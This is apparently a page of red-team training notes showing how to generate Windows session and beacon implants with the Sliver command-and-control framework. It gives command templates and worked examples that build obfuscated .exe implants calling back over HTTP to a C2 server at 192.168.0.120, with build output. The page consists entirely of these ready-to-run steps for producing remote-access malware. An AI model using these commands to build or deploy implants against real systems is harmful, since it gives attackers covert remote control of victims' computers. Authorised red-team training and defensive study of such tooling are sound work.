Windows Implants
Generate Windows Implants
To generate a Windows session implant, the command is similar to this:
generate -f exe --name <implant-name> --os windows --http <server-ipaddress> --save filename.exe
This example creates a file named winsession.exe
and stores it in the implants directory which will be served from the web server.
sliver > generate -f exe --name winsession --os windows --http 192.168.0.120 --save implants/winsession.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 28s
[*] Implant saved to /home/rto/implants/winsession.exe
To generate a Windows beacon implant, the command is:
generate beacon -f exe --name <beacon name> --os windows --http <server-ipaddress> --save filename.exe
This example creates a file named winbeacon.exe
and stores it in the implants directory.
sliver > generate beacon -f exe --name winbeacon --os windows --http 192.168.0.120 --save implants/winbeacon.exe
[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/rto/implants/winbeacon.exe